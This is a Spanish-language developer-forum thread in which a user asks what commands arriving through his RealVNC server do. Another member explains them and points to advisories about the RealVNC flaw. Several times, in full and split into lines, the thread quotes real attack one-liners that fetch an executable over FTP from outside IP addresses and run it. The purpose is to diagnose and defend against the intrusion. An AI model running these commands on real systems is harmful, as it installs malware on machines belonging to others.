Xailer & OZ Software

Desde que he instalado RealVNC en mi Server2003 de vez en cuando recibo
algunas peticiones y directamente me abre el MSDOS...
cmd.exe /c echo open 85.50.52.174 25606>x&echo get
84785_redworld2.exe>>x&echo quit>>x&ftp -n -s:x&84785_redworld2.exe&del
x&exit
cmd.exe /c echo open 85.50.55.180 17226>x&echo get
84785_redworld2.exe>>x&echo quit>>x&ftp -n -s:x&84785_redworld2.exe&del
x&exit
cmd.exe /c echo open 85.50.17.133 30659>x&echo get
84785_redworld2.exe>>x&echo quit>>x&ftp -n -s:x&84785_redworld2.exe&del
x&exit
¿alguien sabe que hace este comando???
Gracias.
Un Saludo,
Xevi.

Xevi,
> ¿alguien sabe que hace este comando???
Si partes la lí­nea desde el ampersand verás que abre una consola, genera un
archivo de nombre x como un script FTP, luego se conecta a un servidor FTP
para descargar un archivo y lo ejecuta.
//---
echo open 85.50.17.133 30659>x
echo get 84785_redworld2.exe>>x
echo quit >>x
ftp -n -s:x
84785_redworld2.exe
del x
exit
//---
He preguntado a San Gugel y me ha dicho:
Grave vulnerabilidad en RealVNC
http://www.hispasec.com/unaaldia/2760
Y parece que tiene cura:
http://www.seguridadenred.net/index.php ... _content&a mp;task=view&id=45&Itemid=28
Espero que te sirva.
Saludos,
José Lalí­n

Gracias maestro!!!
Le pongo la cura pues...
Un Saludo,
Xevi.
"José Lalín" <dezac@corevia.com> ha escrit al missatge del grup de
discussió: 45104a7a$[email=1@news.xailer.com...]1@news.xailer.com...[/email]
>
> Xevi,
>
>> ¿alguien sabe que hace este comando???
>
> Si partes la línea desde el ampersand verás que abre una consola, genera
> un archivo de nombre x como un script FTP, luego se conecta a un servidor
> FTP para descargar un archivo y lo ejecuta.
>
> //---
> echo open 85.50.17.133 30659>x
> echo get 84785_redworld2.exe>>x
> echo quit >>x
> ftp -n -s:x
> 84785_redworld2.exe
> del x
> exit
> //---
>
> He preguntado a San Gugel y me ha dicho:
>
> Grave vulnerabilidad en RealVNC
> http://www.hispasec.com/unaaldia/2760
>
> Y parece que tiene cura:
> http://www.seguridadenred.net/index.php ... _content&a mp;task=view&id=45&Itemid=28
>
> Espero que te sirva.
>
> Saludos,
> José Lalín

Xevi,
Prueba UltraVNC, es compatible 100% con VNC, pero incluye transferencia de
ficheros y además no tiene esos problemas de seguridad.
Un saludo
--
Ignacio Ortiz de Zúñiga
http://www.xailer.com
"Xevi" <xevicomas@gmail.com> escribió en el mensaje
news:[email=45104ada@news.xailer.com...]45104ada@news.xailer.com...[/email]
> Gracias maestro!!!
>
> Le pongo la cura pues...
>
> Un Saludo,
> Xevi.
>
>
> "José Lalín" <dezac@corevia.com> ha escrit al missatge del grup de
> discussió: 45104a7a$[email=1@news.xailer.com...]1@news.xailer.com...[/email]
>>
>> Xevi,
>>
>>> ¿alguien sabe que hace este comando???
>>
>> Si partes la línea desde el ampersand verás que abre una consola, genera
>> un archivo de nombre x como un script FTP, luego se conecta a un servidor
>> FTP para descargar un archivo y lo ejecuta.
>>
>> //---
>> echo open 85.50.17.133 30659>x
>> echo get 84785_redworld2.exe>>x
>> echo quit >>x
>> ftp -n -s:x
>> 84785_redworld2.exe
>> del x
>> exit
>> //---
>>
>> He preguntado a San Gugel y me ha dicho:
>>
>> Grave vulnerabilidad en RealVNC
>> http://www.hispasec.com/unaaldia/2760
>>
>> Y parece que tiene cura:
>> http://www.seguridadenred.net/index.php ... _content&a mp;task=view&id=45&Itemid=28
>>
>> Espero que te sirva.
>>
>> Saludos,
>> José Lalín
>
>

Ignacio,
Ya estuve probando UltraVNC, e incluso me gusta más que RealVNC, ahora bien,
por problemas de compatibilidad (me cuelga la conexión del VNCServer muy a
menudo cuando está el eMule activado, en un Windows2003 Server).
Muchas gracias por vuestras opiniones, que no tienen nada que ver con
Xailer, pero si que tienen que ver para poder solucionar "problemas" que
puedan tener mis aplicaciones hechas en Xailer en clientes que necesitarían
de un desplazamiento para poder repararlo.
Por cierto... dado que me encontré con este error del VNC, me dio por buscar
Controles Remotos en Google, y...
aprovechando el hilo... para los nuestros clientes que tienen IPs
dinámicas... y para no tener que ir abriendo puertos del router...
He probado LogMeIn... y la verdad es que va de fábula!!!
Control Remoto a través de web, sin necesidad de saber la IP del ordenador
Server al cual vamos a manipular remotamente.
GRACIAS.
Un Saludo,
Xevi.
"Ignacio Ortiz de Zúñiga" <NoName@xailer.com> ha escrit al missatge del grup
de discussió: 4510efe4$[email=1@news.xailer.com...]1@news.xailer.com...[/email]
> Xevi,
>
> Prueba UltraVNC, es compatible 100% con VNC, pero incluye transferencia de
> ficheros y además no tiene esos problemas de seguridad.
>
> Un saludo
>
> --
> Ignacio Ortiz de Zúñiga
> http://www.xailer.com
> "Xevi" <xevicomas@gmail.com> escribió en el mensaje
> news:[email=45104ada@news.xailer.com...]45104ada@news.xailer.com...[/email]
>> Gracias maestro!!!
>>
>> Le pongo la cura pues...
>>
>> Un Saludo,
>> Xevi.
>>
>>
>> "José Lalín" <dezac@corevia.com> ha escrit al missatge del grup de
>> discussió: 45104a7a$[email=1@news.xailer.com...]1@news.xailer.com...[/email]
>>>
>>> Xevi,
>>>
>>>> ¿alguien sabe que hace este comando???
>>>
>>> Si partes la línea desde el ampersand verás que abre una consola, genera
>>> un archivo de nombre x como un script FTP, luego se conecta a un
>>> servidor FTP para descargar un archivo y lo ejecuta.
>>>
>>> //---
>>> echo open 85.50.17.133 30659>x
>>> echo get 84785_redworld2.exe>>x
>>> echo quit >>x
>>> ftp -n -s:x
>>> 84785_redworld2.exe
>>> del x
>>> exit
>>> //---
>>>
>>> He preguntado a San Gugel y me ha dicho:
>>>
>>> Grave vulnerabilidad en RealVNC
>>> http://www.hispasec.com/unaaldia/2760
>>>
>>> Y parece que tiene cura:
>>> http://www.seguridadenred.net/index.php ... _content&a mp;task=view&id=45&Itemid=28
>>>
>>> Espero que te sirva.
>>>
>>> Saludos,
>>> José Lalín
>>
>>
>
>

Xevi,
> Ya estuve probando UltraVNC, e incluso me gusta más que RealVNC, ahora bien,
> por problemas de compatibilidad (me cuelga la conexión del VNCServer muy a
> menudo cuando está el eMule activado, en un Windows2003 Server).
Creo que en los ayuda/foros del eMule habí­a algunas explicaciones para
permitir que conviva con otros programas que utilicen intensivamente
sockets sin que se peleen.
Mira también si el VNCServer tiene alguna opción de timeout por defecto
para las conexiones.
> Muchas gracias por vuestras opiniones, que no tienen nada que ver con
> Xailer, pero si que tienen que ver para poder solucionar "problemas" que
> puedan tener mis aplicaciones hechas en Xailer en clientes que necesitarí­an
> de un desplazamiento para poder repararlo.
"No problemo" A mandar.
Saludos,
José Lalí­n